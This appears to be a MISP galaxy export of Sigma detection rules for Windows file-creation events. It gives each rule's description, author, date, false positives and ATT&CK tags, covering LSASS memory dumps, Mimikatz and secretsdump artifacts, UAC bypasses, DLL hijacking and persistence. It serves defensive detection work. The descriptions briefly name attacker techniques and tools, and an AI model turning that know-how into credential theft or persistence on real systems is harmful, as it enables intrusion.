tags ['attack.privilege-escalation', 'attack.execution', 'attack.t1204.002', 'attack.persistence', 'attack.t1547.001']
Related clusters

To see the related clusters, click here.

Startup Folder File Write

A General detection for files being created in the Windows startup directory. This could be an indicator of persistence.

Internal MISP references

UUID 2aa0a6b4-a865-495b-ab51-c28249537b75 which can be used as unique global reference for Startup Folder File Write in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2020-05-02
falsepositive ['FP could be caused by legitimate application writing shortcuts for example. This folder should always be inspected to make sure that all the files in there are legitimate']
filename file_event_win_startup_folder_file_write.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.t1547.001']
Related clusters

To see the related clusters, click here.

PsExec Service File Creation

Detects default PsExec service filename which indicates PsExec service installation and execution

Internal MISP references

UUID 259e5a6a-b8d2-4c38-86e2-26c5e651361d which can be used as unique global reference for PsExec Service File Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Thomas Patzke
creation_date 2017-06-12
falsepositive ['Unknown']
filename file_event_win_sysinternals_psexec_service.yml
level low
logsource.category file_event
logsource.product windows
tags ['attack.execution', 'attack.t1569.002', 'attack.s0029']
Related clusters

To see the related clusters, click here.

Potential Persistence Via Microsoft Office Add-In

Detects potential persistence activity via startup add-ins that load when Microsoft Office starts (.wll/.xll are simply .dll fit for Word or Excel).

Internal MISP references

UUID 8e1cb247-6cf6-42fa-b440-3f27d57e9936 which can be used as unique global reference for Potential Persistence Via Microsoft Office Add-In in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author NVISO
creation_date 2020-05-11
falsepositive ['Legitimate add-ins']
filename file_event_win_office_addin_persistence.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.persistence', 'attack.t1137.006']
Related clusters

To see the related clusters, click here.

OneNote Attachment File Dropped In Suspicious Location

Detects creation of files with the ".one"/".onepkg" extension in suspicious or uncommon locations. This could be a sign of attackers abusing OneNote attachments

Internal MISP references

UUID 7fd164ba-126a-4d9c-9392-0d4f7c243df0 which can be used as unique global reference for OneNote Attachment File Dropped In Suspicious Location in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-01-22
falsepositive ['Legitimate usage of ".one" or ".onepkg" files from those locations']
filename file_event_win_office_onenote_files_in_susp_locations.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.defense-evasion']

Suspicious DotNET CLR Usage Log Artifact

Detects the creation of Usage Log files by the CLR (clr.dll). These files are named after the executing process once the assembly is finished executing for the first time in the (user) session context.

Internal MISP references

UUID e0b06658-7d1d-4cd3-bf15-03467507ff7c which can be used as unique global reference for Suspicious DotNET CLR Usage Log Artifact in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, omkar72, oscd.community, Wojciech Lesicki
creation_date 2022-11-18
falsepositive ['Rundll32.exe with zzzzInvokeManagedCustomActionOutOfProc in command line and msiexec.exe as parent process - https://twitter.com/SBousseaden/status/1388064061087260675']
filename file_event_win_net_cli_artefact.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

NTDS.DIT Created

Detects creation of a file named "ntds.dit" (Active Directory Database)

Internal MISP references

UUID 0b8baa3f-575c-46ee-8715-d6f28cc7d33c which can be used as unique global reference for NTDS.DIT Created in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-05-05
falsepositive ['Unknown']
filename file_event_win_ntds_dit_creation.yml
level low
logsource.category file_event
logsource.product windows
tags ['attack.credential-access', 'attack.t1003.003']
Related clusters

To see the related clusters, click here.

PSScriptPolicyTest Creation By Uncommon Process

Detects the creation of the "PSScriptPolicyTest" PowerShell script by an uncommon process. This file is usually generated by Microsoft Powershell to test against Applocker.

Internal MISP references

UUID 1027d292-dd87-4a1a-8701-2abe04d7783c which can be used as unique global reference for PSScriptPolicyTest Creation By Uncommon Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-06-01
falsepositive ['Unknown']
filename file_event_win_ps_script_policy_test_creation_by_uncommon_process.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.defense-evasion']

Potential Winnti Dropper Activity

Detects files dropped by Winnti as described in RedMimicry Winnti playbook

Internal MISP references

UUID 130c9e58-28ac-4f83-8574-0a4cc913b97e which can be used as unique global reference for Potential Winnti Dropper Activity in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Alexander Rausch
creation_date 2020-06-24
falsepositive ['Unknown']
filename file_event_win_redmimicry_winnti_filedrop.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1027']
Related clusters

To see the related clusters, click here.

UEFI Persistence Via Wpbbin - FileCreation

Detects creation of a file named "wpbbin" in the "%systemroot%\system32\" directory. Which could be indicative of UEFI based persistence method

Internal MISP references

UUID e94b9ddc-eec5-4bb8-8a58-b9dc5f4e185f which can be used as unique global reference for UEFI Persistence Via Wpbbin - FileCreation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-07-18
falsepositive ['Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)']
filename file_event_win_wpbbin_persistence.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.persistence', 'attack.defense-evasion', 'attack.t1542.001']
Related clusters

To see the related clusters, click here.

PDF File Created By RegEdit.EXE

Detects the creation of a file with the ".pdf" extension by the "RegEdit.exe" process. This indicates that a user is trying to print/save a registry key as a PDF in order to potentially extract sensitive information and bypass defenses.

Internal MISP references

UUID 145095eb-e273-443b-83d0-f9b519b7867b which can be used as unique global reference for PDF File Created By RegEdit.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2024-07-08
falsepositive ['Unlikely']
filename file_event_win_regedit_print_as_pdf.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.defense-evasion']

PowerShell Module File Created By Non-PowerShell Process

Detects the creation of a new PowerShell module ".psm1", ".psd1", ".dll", ".ps1", etc. by a non-PowerShell process

Internal MISP references

UUID e3845023-ca9a-4024-b2b2-5422156d5527 which can be used as unique global reference for PowerShell Module File Created By Non-PowerShell Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-05-09
falsepositive ['Unknown']
filename file_event_win_powershell_module_uncommon_creation.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.persistence']

PCRE.NET Package Temp Files

Detects processes creating temp files related to PCRE.NET package

Internal MISP references

UUID 6e90ae7a-7cd3-473f-a035-4ebb72d961da which can be used as unique global reference for PCRE.NET Package Temp Files in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2020-10-29
falsepositive ['Unknown']
filename file_event_win_pcre_net_temp_file.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.execution', 'attack.t1059']
Related clusters

To see the related clusters, click here.

Potential DCOM InternetExplorer.Application DLL Hijack

Detects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application Class over the network

Internal MISP references

UUID 2f7979ae-f82b-45af-ac1d-2b10e93b0baa which can be used as unique global reference for Potential DCOM InternetExplorer.Application DLL Hijack in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga
creation_date 2020-10-12
falsepositive ['Unknown']
filename file_event_win_dcom_iertutil_dll_hijack.yml
level critical
logsource.category file_event
logsource.product windows
tags ['attack.lateral-movement', 'attack.t1021.002', 'attack.t1021.003']
Related clusters

To see the related clusters, click here.

Adwind RAT / JRAT File Artifact

Detects javaw.exe in AppData folder as used by Adwind / JRAT

Internal MISP references

UUID 0bcfabcb-7929-47f4-93d6-b33fb67d34d1 which can be used as unique global reference for Adwind RAT / JRAT File Artifact in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community
creation_date 2017-11-10
falsepositive No established falsepositives
filename file_event_win_mal_adwind.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.execution', 'attack.t1059.005', 'attack.t1059.007']
Related clusters

To see the related clusters, click here.

TeamViewer Remote Session

Detects the creation of log files during a TeamViewer remote session

Internal MISP references

UUID 162ab1e4-6874-4564-853c-53ec3ab8be01 which can be used as unique global reference for TeamViewer Remote Session in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022-01-30
falsepositive ['Legitimate uses of TeamViewer in an organisation']
filename file_event_win_susp_teamviewer_remote_session.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.command-and-control', 'attack.t1219.002']
Related clusters

To see the related clusters, click here.

Malicious DLL File Dropped in the Teams or OneDrive Folder

Detects creation of a malicious DLL file in the location where the OneDrive or Team applications Upon execution of the Teams or OneDrive application, the dropped malicious DLL file ("iphlpapi.dll") is sideloaded

Internal MISP references

UUID 1908fcc1-1b92-4272-8214-0fbaf2fa5163 which can be used as unique global reference for Malicious DLL File Dropped in the Teams or OneDrive Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-08-12
falsepositive ['Unknown']
filename file_event_win_iphlpapi_dll_sideloading.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.persistence', 'attack.privilege-escalation', 'attack.defense-evasion', 'attack.t1574.001']
Related clusters

To see the related clusters, click here.

Potential Homoglyph Attack Using Lookalike Characters in Filename

Detects the presence of unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters. This is used as an obfuscation and masquerading techniques. Only "perfect" homoglyphs are included; these are characters that are indistinguishable from ASCII characters and thus may make excellent candidates for homoglyph attack characters.

Internal MISP references

UUID 4f1707b1-b50b-45b4-b5a2-3978b5a5d0d6 which can be used as unique global reference for Potential Homoglyph Attack Using Lookalike Characters in Filename in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Micah Babinski, @micahbabinski
creation_date 2023-05-08
falsepositive ['File names with legitimate Cyrillic text. Will likely require tuning (or not be usable) in countries where these alphabets are in use.']
filename file_event_win_susp_homoglyph_filename.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1036', 'attack.t1036.003']
Related clusters

To see the related clusters, click here.

WerFault LSASS Process Memory Dump

Detects WerFault creating a dump file with a name that indicates that the dump file could be an LSASS process memory, which contains user credentials

Internal MISP references

UUID c3e76af5-4ce0-4a14-9c9a-25ceb8fda182 which can be used as unique global reference for WerFault LSASS Process Memory Dump in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022-06-27
falsepositive ['Unknown']
filename file_event_win_lsass_werfault_dump.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.credential-access', 'attack.t1003.001']
Related clusters

To see the related clusters, click here.

Legitimate Application Dropped Executable

Detects programs on a Windows system that should not write executables to disk

Internal MISP references

UUID f0540f7e-2db3-4432-b9e0-3965486744bc which can be used as unique global reference for Legitimate Application Dropped Executable in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Florian Roth (Nextron Systems)
creation_date 2022-08-21
falsepositive ['Unknown']
filename file_event_win_susp_legitimate_app_dropping_exe.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

NTDS.DIT Creation By Uncommon Process

Detects creation of a file named "ntds.dit" (Active Directory Database) by an uncommon process or a process located in a suspicious directory

Internal MISP references

UUID 11b1ed55-154d-4e82-8ad7-83739298f720 which can be used as unique global reference for NTDS.DIT Creation By Uncommon Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-01-11
falsepositive ['Unknown']
filename file_event_win_ntds_dit_uncommon_process.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.credential-access', 'attack.t1003.002', 'attack.t1003.003']
Related clusters

To see the related clusters, click here.

Writing Local Admin Share

Aversaries may use to interact with a remote network share using Server Message Block (SMB). This technique is used by post-exploitation frameworks.

Internal MISP references

UUID 4aafb0fa-bff5-4b9d-b99e-8093e659c65f which can be used as unique global reference for Writing Local Admin Share in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-01-01
falsepositive ['Unknown']
filename file_event_win_writing_local_admin_share.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.lateral-movement', 'attack.t1546.002']
Related clusters

To see the related clusters, click here.

Suspicious MSExchangeMailboxReplication ASPX Write

Detects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .apsx files to disk, which could be a sign of ProxyShell exploitation

Internal MISP references

UUID 7280c9f3-a5af-45d0-916a-bc01cb4151c9 which can be used as unique global reference for Suspicious MSExchangeMailboxReplication ASPX Write in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022-02-25
falsepositive ['Unknown']
filename file_event_win_susp_exchange_aspx_write.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.initial-access', 'attack.t1190', 'attack.persistence', 'attack.t1505.003']
Related clusters

To see the related clusters, click here.

Files With System Process Name In Unsuspected Locations

Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64, etc.). It is highly recommended to perform an initial baseline before using this rule in production.

Internal MISP references

UUID d5866ddf-ce8f-4aea-b28e-d96485a20d3d which can be used as unique global reference for Files With System Process Name In Unsuspected Locations in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems)
creation_date 2020-05-26
falsepositive ['System processes copied outside their default folders for testing purposes', 'Third party software naming their software with the same names as the processes mentioned here']
filename file_event_win_creation_system_file.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1036.005']
Related clusters

To see the related clusters, click here.

HackTool - Potential Remote Credential Dumping Activity Via CrackMapExec Or Impacket-Secretsdump

Detects default filenames output from the execution of CrackMapExec and Impacket-secretsdump against an endpoint.

Internal MISP references

UUID 6e2a900a-ced9-4e4a-a9c2-13e706f9518a which can be used as unique global reference for HackTool - Potential Remote Credential Dumping Activity Via CrackMapExec Or Impacket-Secretsdump in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author SecurityAura
creation_date 2022-11-16
falsepositive ['Unknown']
filename file_event_win_hktl_remote_cred_dump.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.credential-access', 'attack.t1003']
Related clusters

To see the related clusters, click here.

UAC Bypass Using IEInstal - File

Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)

Internal MISP references

UUID bdd8157d-8e85-4397-bb82-f06cc9c71dbb which can be used as unique global reference for UAC Bypass Using IEInstal - File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021-08-30
falsepositive ['Unknown']
filename file_event_win_uac_bypass_ieinstal.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.defense-evasion', 'attack.privilege-escalation', 'attack.t1548.002']
Related clusters

To see the related clusters, click here.

Publisher Attachment File Dropped In Suspicious Location

Detects creation of files with the ".pub" extension in suspicious or uncommon locations. This could be a sign of attackers abusing Publisher documents

Internal MISP references

UUID 3d2a2d59-929c-4b78-8c1a-145dfe9e07b1 which can be used as unique global reference for Publisher Attachment File Dropped In Suspicious Location in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-02-08
falsepositive ['Legitimate usage of ".pub" files from those locations']
filename file_event_win_office_publisher_files_in_susp_locations.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.defense-evasion']

Suspicious File Write to SharePoint Layouts Directory

Detects suspicious file writes to SharePoint layouts directory which could indicate webshell activity or post-exploitation. This behavior has been observed in the exploitation of SharePoint vulnerabilities such as CVE-2025-49704, CVE-2025-49706 or CVE-2025-53770.

Internal MISP references

UUID 1f0489be-b496-4ddf-b3a9-5900f2044e9c which can be used as unique global reference for Suspicious File Write to SharePoint Layouts Directory in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Swachchhanda Shrawan Poudel (Nextron Systems)
creation_date 2025-07-24
falsepositive ['Unknown']
filename file_event_win_susp_filewrite_in_sharepoint_layouts_dir.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.initial-access', 'attack.t1190', 'attack.persistence', 'attack.t1505.003']
Related clusters

To see the related clusters, click here.

Potential Binary Or Script Dropper Via PowerShell

Detects PowerShell creating a binary executable or a script file.

Internal MISP references

UUID 7047d730-036f-4f40-b9d8-1c63e36d5e62 which can be used as unique global reference for Potential Binary Or Script Dropper Via PowerShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-03-17
falsepositive ['False positives will differ depending on the environment and scripts used. Apply additional filters accordingly.']
filename file_event_win_powershell_drop_binary_or_script.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.persistence']

Windows Shell/Scripting Application File Write to Suspicious Folder

Detects Windows shells and scripting applications that write files to suspicious folders

Internal MISP references

UUID 1277f594-a7d1-4f28-a2d3-73af5cbeab43 which can be used as unique global reference for Windows Shell/Scripting Application File Write to Suspicious Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021-11-20
falsepositive ['Unknown']
filename file_event_win_shell_write_susp_directory.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.execution', 'attack.t1059']
Related clusters

To see the related clusters, click here.

Uncommon File Created In Office Startup Folder

Detects the creation of a file with an uncommon extension in an Office application startup folder

Internal MISP references

UUID a10a2c40-2c4d-49f8-b557-1a946bc55d9d which can be used as unique global reference for Uncommon File Created In Office Startup Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-06-05
falsepositive ['False positive might stem from rare extensions used by other Office utilities.']
filename file_event_win_office_uncommon_file_startup.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.resource-development', 'attack.t1587.001']
Related clusters

To see the related clusters, click here.

DPAPI Backup Keys And Certificate Export Activity IOC

Detects file names with specific patterns seen generated and used by tools such as Mimikatz and DSInternals related to exported or stolen DPAPI backup keys and certificates.

Internal MISP references

UUID 7892ec59-c5bb-496d-8968-e5d210ca3ac4 which can be used as unique global reference for DPAPI Backup Keys And Certificate Export Activity IOC in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nounou Mbeiri, Nasreddine Bencherchali (Nextron Systems)
creation_date 2024-06-26
falsepositive ['Unlikely']
filename file_event_win_susp_dpapi_backup_and_cert_export_ioc.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.credential-access', 'attack.t1555', 'attack.t1552.004']
Related clusters

To see the related clusters, click here.

HackTool - Mimikatz Kirbi File Creation

Detects the creation of files created by mimikatz such as ".kirbi", "mimilsa.log", etc.

Internal MISP references

UUID 9e099d99-44c2-42b6-a6d8-54c3545cab29 which can be used as unique global reference for HackTool - Mimikatz Kirbi File Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), David ANDRE
creation_date 2021-11-08
falsepositive ['Unlikely']
filename file_event_win_hktl_mimikatz_files.yml
level critical
logsource.category file_event
logsource.product windows
tags ['attack.credential-access', 'attack.t1558']
Related clusters

To see the related clusters, click here.

Potential Persistence Via Notepad++ Plugins

Detects creation of new ".dll" files inside the plugins directory of a notepad++ installation by a process other than "gup.exe". Which could indicates possible persistence

Internal MISP references

UUID 54127bd4-f541-4ac3-afdb-ea073f63f692 which can be used as unique global reference for Potential Persistence Via Notepad++ Plugins in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-06-10
falsepositive ['Possible FPs during first installation of Notepad++', 'Legitimate use of custom plugins by users in order to enhance notepad++ functionalities']
filename file_event_win_notepad_plus_plus_persistence.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.persistence']

Malicious PowerShell Scripts - FileCreation

Detects the creation of known offensive powershell scripts used for exploitation

Internal MISP references

UUID f331aa1f-8c53-4fc3-b083-cc159bc971cb which can be used as unique global reference for Malicious PowerShell Scripts - FileCreation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Markus Neis, Nasreddine Bencherchali (Nextron Systems), Mustafa Kaan Demir, Georg Lauenstein
creation_date 2018-04-07
falsepositive ['Unknown']
filename file_event_win_powershell_exploit_scripts.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Dynamic CSharp Compile Artefact

When C# is compiled dynamically, a .cmdline file will be created as a part of the process. Certain processes are not typically observed compiling C# code, but can do so without touching disk. This can be used to unpack a payload for execution

Internal MISP references

UUID e4a74e34-ecde-4aab-b2fb-9112dd01aed0 which can be used as unique global reference for Dynamic CSharp Compile Artefact in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-01-09
falsepositive ['Unknown']
filename file_event_win_csharp_compile_artefact.yml
level low
logsource.category file_event
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1027.004']
Related clusters

To see the related clusters, click here.

LSASS Process Memory Dump Creation Via Taskmgr.EXE

Detects the creation of an "lsass.dmp" file by the taskmgr process. This indicates a manual dumping of the LSASS.exe process memory using Windows Task Manager.

Internal MISP references

UUID 69ca12af-119d-44ed-b50f-a47af0ebc364 which can be used as unique global reference for LSASS Process Memory Dump Creation Via Taskmgr.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Swachchhanda Shrawan Poudel
creation_date 2023-10-19
falsepositive ['Rare case of troubleshooting by an administrator or support that has to be investigated regardless']
filename file_event_win_taskmgr_lsass_dump.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.credential-access', 'attack.t1003.001']
Related clusters

To see the related clusters, click here.

PSEXEC Remote Execution File Artefact

Detects creation of the PSEXEC key file. Which is created anytime a PsExec command is executed. It gets written to the file system and will be recorded in the USN Journal on the target system

Internal MISP references

UUID 304afd73-55a5-4bb9-8c21-0b1fc84ea9e4 which can be used as unique global reference for PSEXEC Remote Execution File Artefact in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-01-21
falsepositive ['Unlikely']
filename file_event_win_sysinternals_psexec_service_key.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.lateral-movement', 'attack.privilege-escalation', 'attack.execution', 'attack.persistence', 'attack.t1136.002', 'attack.t1543.003', 'attack.t1570', 'attack.s0029']
Related clusters

To see the related clusters, click here.

LSASS Process Memory Dump Files

Detects creation of files with names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials.

Internal MISP references

UUID a5a2d357-1ab8-4675-a967-ef9990a59391 which can be used as unique global reference for LSASS Process Memory Dump Files in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021-11-15
falsepositive ['Unknown']
filename file_event_win_lsass_default_dump_file_names.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.credential-access', 'attack.t1003.001']
Related clusters

To see the related clusters, click here.

UAC Bypass Using NTFS Reparse Point - File

Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)

Internal MISP references

UUID 7fff6773-2baa-46de-a24a-b6eec1aba2d1 which can be used as unique global reference for UAC Bypass Using NTFS Reparse Point - File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021-08-30
falsepositive ['Unknown']
filename file_event_win_uac_bypass_ntfs_reparse_point.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.defense-evasion', 'attack.privilege-escalation', 'attack.t1548.002']
Related clusters

To see the related clusters, click here.

Suspicious Scheduled Task Write to System32 Tasks

Detects the creation of tasks from processes executed from suspicious locations

Internal MISP references

UUID 80e1f67a-4596-4351-98f5-a9c3efabac95 which can be used as unique global reference for Suspicious Scheduled Task Write to System32 Tasks in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021-11-16
falsepositive ['Unknown']
filename file_event_win_susp_task_write.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.execution', 'attack.t1053']
Related clusters

To see the related clusters, click here.

ISO or Image Mount Indicator in Recent Files

Detects the creation of recent element file that points to an .ISO, .IMG, .VHD or .VHDX file as often used in phishing attacks. This can be a false positive on server systems but on workstations users should rarely mount .iso or .img files.

Internal MISP references

UUID 4358e5a5-7542-4dcb-b9f3-87667371839b which can be used as unique global reference for ISO or Image Mount Indicator in Recent Files in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022-02-11
falsepositive ['Cases in which a user mounts an image file for legitimate reasons']
filename file_event_win_iso_file_recent.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.initial-access', 'attack.t1566.001']
Related clusters

To see the related clusters, click here.

Creation Exe for Service with Unquoted Path

Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.

Internal MISP references

UUID 8c3c76ca-8f8b-4b1d-aaf3-81aebcd367c9 which can be used as unique global reference for Creation Exe for Service with Unquoted Path in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021-12-30
falsepositive ['Unknown']
filename file_event_win_creation_unquoted_service_path.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.t1547.009']
Related clusters

To see the related clusters, click here.

Windows Terminal Profile Settings Modification By Uncommon Process

Detects the creation or modification of the Windows Terminal Profile settings file "settings.json" by an uncommon process.

Internal MISP references

UUID 9b64de98-9db3-4033-bd7a-f51430105f00 which can be used as unique global reference for Windows Terminal Profile Settings Modification By Uncommon Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-07-22
falsepositive ['Some false positives may occur with admin scripts that set WT settings.']
filename file_event_win_susp_windows_terminal_profile.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.t1547.015']
Related clusters

To see the related clusters, click here.

Suspicious Files in Default GPO Folder

Detects the creation of copy of suspicious files (EXE/DLL) to the default GPO storage folder

Internal MISP references

UUID 5f87308a-0a5b-4623-ae15-d8fa1809bc60 which can be used as unique global reference for Suspicious Files in Default GPO Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author elhoim
creation_date 2022-04-28
falsepositive ['Unknown']
filename file_event_win_susp_default_gpo_dir_write.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.t1036.005', 'attack.defense-evasion']
Related clusters

To see the related clusters, click here.

SCR File Write Event

Detects the creation of screensaver files (.scr) outside of system folders. Attackers may execute an application as an ".SCR" file using "rundll32.exe desk.cpl,InstallScreenSaver" for example.

Internal MISP references

UUID c048f047-7e2a-4888-b302-55f509d4a91d which can be used as unique global reference for SCR File Write Event in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christopher Peacock @securepeacock, SCYTHE @scythe_io
creation_date 2022-04-27
falsepositive ['The installation of new screen savers by third party software']
filename file_event_win_new_scr_file.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1218.011']
Related clusters

To see the related clusters, click here.

Wmiprvse Wbemcomn DLL Hijack - File

Detects a threat actor creating a file named wbemcomn.dll in the C:\Windows\System32\wbem\ directory over the network and loading it for a WMI DLL Hijack scenario.

Internal MISP references

UUID 614a7e17-5643-4d89-b6fe-f9df1a79641c which can be used as unique global reference for Wmiprvse Wbemcomn DLL Hijack - File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2020-10-12
falsepositive ['Unknown']
filename file_event_win_wmiprvse_wbemcomn_dll_hijack.yml
level critical
logsource.category file_event
logsource.product windows
tags ['attack.execution', 'attack.t1047', 'attack.lateral-movement', 'attack.t1021.002']
Related clusters

To see the related clusters, click here.

PowerShell Script Dropped Via PowerShell.EXE

Detects PowerShell creating a PowerShell file (.ps1). While often times this behavior is benign, sometimes it can be a sign of a dropper script trying to achieve persistence.

Internal MISP references

